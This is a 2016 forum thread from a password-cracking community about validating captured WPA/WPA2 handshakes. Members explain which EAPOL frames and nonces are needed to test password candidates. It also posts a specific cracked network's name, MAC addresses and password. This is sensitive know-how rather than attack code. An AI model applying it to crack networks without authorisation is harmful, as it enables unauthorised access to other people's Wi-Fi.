NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - Handshake analysis?????


5 Results - Page 1 of 1 -
1
Author Message
Avatar
frenchy1

Status: Cracker
Joined: Tue, 28 Jul 2015
Posts: 647
Team:
Reputation: 396 Reputation
Offline
Tue, 15 Mar 2016 @ 07:12:11

HI

I keep coming across the same question about handshake validation

is pyrit correct when it says

#1: AccessPoint 90:f6:52:49:1a:9a ('AB2016'):
#1: Station 00:15:6d:da:c5:1b, 1 handshake(s):
#1: HMAC_SHA1_AES, bad, spread 1

when the same handshake is analyzed in wireshark it shows message 1 of 4 and message 4 of 4 yet when i run this against a wordlist the password is still FOUND.

what i have been led to believe is you only require message 1 of 2 and message 2 of 4 to enable you to crack the password as long as it in the wordlist but this is clearly not the case.

i have also had some handshakes where it would only find the handshake if it had been stripped by pyrit which it would then show as a bad capture then converted to .hccap which would reveal the password and then some again that would only find the password if you did not clean the file.

i am really just asking how many times we chase our tails trying the handshakes when there seems to be different variables on the whether the handshake is valid or not.

i am sure you guys have thoughts on this or experiences you would like to share.

one thing is for sure is that pyrit is not reliable at all for handshake analysis and wireshark can show message 1 of 4 and 4 of 4 and still find the password. it leads me to wonder if we all these uploads with message 1 of 1 and message 2 of 2 are even worth running?

if i am probably missing something really obvious please let me know



Just a hobbyist

Avatar
gpuhash_me

Status: Trusted
Joined: Sun, 08 Nov 2015
Posts: 822
Team: gpuhash team
Reputation: 1523 Reputation
Online
Tue, 15 Mar 2016 @ 13:36:47

To calculate current PTK candidate you need:

1. PMK = HMAC-SHA1(ESSID, key), where key is current password candidate
2. "Pairwise key expansion" (fixed string)
3. ANonce (comes from frame 1/4 or 3/4 of current handshake)
4. SNonce (comes from frame 2/4 of the same handshake)
5. BSSID (from any frame)
6. Station (client) MAC (from any frame)

We described WPA authentication process here.

As you can see from the list the most problematic field is SNonce which comes from frame 2/4 only.
Frame 4/4 does not contain any nonce (nonce field is zeroed) so I have no idea how you can crack WPA password with 1/4 and 4/4 frames only.

Anyway if you share your handshake, resulting hccap and password we can further investigate this issue.


Head of cheap publicity department
Support, discounts, free offers for HK members
BTC: 1GpuHashTYDRn3S6jbLM4YwmutU5iVCxrf

Avatar
frenchy1

Status: Cracker
Joined: Tue, 28 Jul 2015
Posts: 647
Team:
Reputation: 396 Reputation
Offline
Wed, 16 Mar 2016 @ 03:31:09

hi gpuhashme

please see link to cap file and hccap file

https://www.sendspace.com/file/m9fe2u https://www.sendspace.com/file/5kpu2a

and the password is AB2016:00156ddac51b:90f652491a9a:qwertyuiop



Just a hobbyist

Avatar
gpuhash_me

Status: Trusted
Joined: Sun, 08 Nov 2015
Posts: 822
Team: gpuhash team
Reputation: 1523 Reputation
Online
Wed, 16 Mar 2016 @ 09:40:16

Your frame 4/4 carries SNonce value and has replay counter of 1, I suppose it is actually frame 2/4 but it was falsely reported by Wireshark as 4/4 for unknown reason. True 4/4 frame has replay counter 2 and zeroed nonce value. Just my opinion.

BTW our custom parser accepted your handshake and we found the password you mentioned above.



Head of cheap publicity department
Support, discounts, free offers for HK members
BTC: 1GpuHashTYDRn3S6jbLM4YwmutU5iVCxrf

Avatar
frenchy1

Status: Cracker
Joined: Tue, 28 Jul 2015
Posts: 647
Team:
Reputation: 396 Reputation
Offline
Wed, 16 Mar 2016 @ 19:23:37

thankyou for taking the time to explain how this works. you have been most help full



Just a hobbyist


5 Results - Page 1 of 1 -
1

We have a total of 210261 messages in 25832 topics.
We have a total of 22908 registered users.
Our newest registered member is voztok94.